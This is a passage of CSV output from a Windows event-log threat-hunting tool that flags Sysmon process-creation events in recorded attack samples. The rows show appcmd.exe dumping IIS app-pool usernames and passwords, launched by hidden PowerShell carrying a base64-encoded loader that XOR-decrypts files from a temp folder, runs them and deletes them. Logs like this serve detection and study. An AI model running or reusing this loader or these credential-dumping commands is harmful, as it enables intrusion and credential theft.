ADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3240 | PGUID: 365ABB72-3D6D-5CEB-0000-0010D763FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.350 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3096 | PGUID: 365ABB72-3D6D-5CEB-0000-00109767FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.581 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2928 | PGUID: 365ABB72-3D6D-5CEB-0000-0010576BFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.661 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1340 | PGUID: 365ABB72-3D6D-5CEB-0000-00108270FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.731 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2448 | PGUID: 365ABB72-3D6D-5CEB-0000-00104474FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.811 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABf